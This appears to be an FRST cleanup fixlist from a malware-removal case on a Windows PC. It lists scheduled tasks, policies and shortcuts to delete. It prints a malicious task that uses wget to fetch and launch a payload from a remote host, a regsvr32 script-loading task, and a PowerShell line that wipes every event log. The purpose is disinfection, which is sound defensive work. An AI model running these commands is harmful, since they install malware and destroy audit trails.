CloseProcesses: CreateRestorePoint: GroupPolicy: Restriction <==== ATTENTION GroupPolicyUsers\S-1-5-21-3338460377-1035617240-3592817547-1001\User: Restriction <==== ATTENTION CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings: [ProxySettingsPerUser] 0 <==== ATTENTION (Restriction - ProxySettings) HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - D:\ESET\ESET Smart Security\Mozilla Thunderbird => not found CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - D:\Internet Download Manager\IDMGCExt.crx 2018-01-26 18:13 - 2018-01-26 18:18 - 000000000 ____D C:\AdwCleaner CustomCLSID: HKU\S-1-5-21-3338460377-1035617240-3592817547-1001_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 -> C:\Users\Kuba\AppData\Local\Microsoft\OneDrive\17.3.7131.1115\amd64\FileSyncShell64.dll => No File CustomCLSID: HKU\S-1-5-21-3338460377-1035617240-3592817547-1001_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 -> C:\Users\Kuba\AppData\Local\Microsoft\OneDrive\17.3.7131.1115\amd64\FileSyncShell64.dll => No File CustomCLSID: HKU\S-1-5-21-3338460377-1035617240-3592817547-1001_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32 -> C:\Users\Kuba\AppData\Local\Microsoft\OneDrive\17.3.7131.1115\amd64\FileSyncShell64.dll => No File ContextMenuHandlers1: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> No File ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> No File ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => -> No File ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} => -> No File ContextMenuHandlers4: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> No File ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> No File Task: {0F32CD89-7349-4DF1-907E-8BDDF0FDA4FF} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION Task: {12019626-691F-462A-877A-54009CA8FFE1} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION Task: {1D4F8634-EDE2-423E-B7B8-90EA16A8CA3E} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grigle.in/index.php?data=KEy9HdgPlS;Nero_BurningROM2014-15.0.03900_trial.exe;1423482306 & start cmd /R dat.bmp <==== ATTENTION Task: {1DA05B72-C9FF-464B-86D9-3F8A33B4120C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION Task: {1FCB9178-9830-49C3-89F5-DC342024EE28} - System32\Tasks\{55F8496A-A085-4AAB-9E43-B090C3019AA4} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\TreeSondex\uninstall.exe" -c shuz -f "C:\Program Files (x86)\Common Files\TreeSondex\uninstall.dat" -a uninstallme 7522E4EA-1ACE-45A4-BBF9-129B9513C307 DeviceId=05f8e6e5-c3c4-050f-79c2-e538d8beee67 BarcodeId=51198003 ChannelId=3 DistributerName=APSFWakeNet Task: {2FA7DFB0-7C90-4D3B-B3E3-3B1BE2C29218} - System32\Tasks\{0B6B7ED4-F9B0-4FEE-B80F-4F5FBF45EE58} => C:\WINDOWS\system32\pcalua.exe -a "D:\Electronic Arts\Harry Potter i Książę Półkrwi™\Support\Harry Potter and the Half-Blood Prince_uninst.exe" -d "D:\Electronic Arts\Harry Potter i Książę Półkrwi™\Support" Task: {620A87CB-88AA-4B0D-9992-9FABA4DE2CDC} - System32\Tasks\FileFly => c:\programdata\{a9c98202-6e05-2ce5-a9c9-982026e00809}\461613016231735287b.exe <==== ATTENTION Task: {74DC3443-7AA0-4E36-9599-B74A9C5969A0} - System32\Tasks\{D19480A7-1C66-4718-A8E7-F7E7E50BF497} => C:\WINDOWS\system32\pcalua.exe -a "D:\FIFA 14\FIFA 14\ModdingWayInstaller.exe" -d "D:\FIFA 14\FIFA 14" Task: {770B9597-E2AE-4BB0-895C-A38B09C55C11} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION Task: {7C66FF70-56BD-41B3-B26E-AE0C5C9A54A1} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION Task: {7DEA7A48-3471-400A-A2B0-5BA365DEA500} - System32\Tasks\{34B4CAAD-11F8-4171-A5C6-F0D058BBECC9} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxp://ui.skype.com/ui/0/7.16.0.101/pl/abandoninstall?source=lightinstaller&page=tsPlugin Task: {7E8FE418-B5EF-446D-9293-4B095C5FB793} - System32\Tasks\{F7606602-E4E6-4ABA-B255-0B35486D49BB} => C:\WINDOWS\system32\pcalua.exe -a "D:\Electronic Arts\Harry Potter i Książę Półkrwi™\Support\Harry Potter and the Half-Blood Prince_code.exe" -d "D:\Electronic Arts\Harry Potter i Książę Półkrwi™\Support" Task: {8B46E8C1-AEFC-49D1-8522-02E4C45F912D} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION Task: {9248F670-676C-4190-AB1A-44DD598710D2} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION Task: {9B4F6793-CF3F-4D89-8741-97367C230EE1} - System32\Tasks\{29B5CD46-A6CA-4EA3-98F0-78DF954E236F} => C:\WINDOWS\system32\pcalua.exe -a D:\KMSpico\unins000.exe Task: {9E88CD04-A2E3-41EA-A63F-5E8F99686800} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION Task: {A2B06537-F7F0-4A38-BE1C-C04DB75FE0A0} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION Task: {A3169C11-BCCA-4CB5-A08C-A51FDDC0DF4E} - System32\Tasks\4B55B688-1080-8A52-689E-71FB723AAFC3 => C:\WINDOWS\SysWOW64\regsvr32.exe /n /s /i:"/4ba6e1555c879c97 /q" "C:\Users\Kuba\AppData\Local\348936~1\{8BE76~1." Task: {C3B9D0C9-5271-42B1-A4CD-E31139294E43} - System32\Tasks\{19B825F8-9F85-4BF6-827A-627D610B159C} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxp://ui.skype.com/ui/0/7.16.0.101/pl/abandoninstall?source=lightinstaller&page=tsBing Task: {CFBF0E7F-1CBF-4855-82B0-6EDB908AF560} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION Task: {D04221DC-B8CA-448C-A4E2-AF42C3CCE8C2} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION Task: {D4686AC8-5458-4B85-940E-907BCC7A1D35} - System32\Tasks\{0FAFF3B4-ED64-4F84-81E8-F6FEF9CD8CCE} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxp://ui.skype.com/ui/0/7.16.0.101/pl/abandoninstall?source=lightinstaller&page=tsInstall Task: {DDC5D6E7-EDD2-4715-8145-3B60B1AEB42B} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION Task: C:\WINDOWS\Tasks\FileFly.job => c:\programdata\{a9c98202-6e05-2ce5-a9c9-982026e00809}\461613016231735287b.exe <==== ATTENTION AlternateDataStreams: C:\ProgramData\TEMP:B755D674 [352] AlternateDataStreams: C:\ProgramData\TEMP:D78D6FF7 [154] Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Minecraft\Minecraft .lnk -> C:\Users\Kuba\AppData\Roaming\.minecraft\Minecraft.exe (No File) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Minecraft\Uninstall Minecraft .lnk -> C:\Users\Kuba\AppData\Roaming\.minecraft\unins000.exe (No File) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Android Studio\Android Studio.lnk -> D:\Android\Android Studio\bin\studio64.exe (No File) Shortcut: C:\ProgramData\Microsoft\Windows\GameExplorer\{CDBE959D-BBEA-4785-8F62-BACA506B6FFB}\PlayTasks\4\Program konfiguracyjny.lnk -> D:\Assassin's Creed\Detection\Detection.exe (No File) Shortcut: C:\ProgramData\Microsoft\Windows\GameExplorer\{CDBE959D-BBEA-4785-8F62-BACA506B6FFB}\PlayTasks\3\Instrukcja do gry.lnk -> D:\Assassin's Creed\Support\Manual\AssassinsCreed.pdf (No File) Shortcut: C:\ProgramData\Microsoft\Windows\GameExplorer\{CDBE959D-BBEA-4785-8F62-BACA506B6FFB}\PlayTasks\2\CzytajTo.txt.lnk -> D:\Assassin's Creed\Support\ReadMe\CzytajTo.txt (No File) Shortcut: C:\ProgramData\Microsoft\Windows\GameExplorer\{CDBE959D-BBEA-4785-8F62-BACA506B6FFB}\PlayTasks\1\Rejestruj.lnk -> D:\Assassin's Creed\Register\RegistrationReminder.exe (No File) Shortcut: C:\ProgramData\Microsoft\Windows\GameExplorer\{CDBE959D-BBEA-4785-8F62-BACA506B6FFB}\PlayTasks\0\Graj.lnk -> D:\Assassin's Creed\AssassinsCreed_Launcher.exe (No File) C:\Users\Kuba\Desktop\Euro Truck Simulator 2.lnk C:\Users\Kuba\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.Studios.PinballFx2_8wekyb3d8bbwe\Pinball.App.lnk EmptyTemp: Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} Hosts: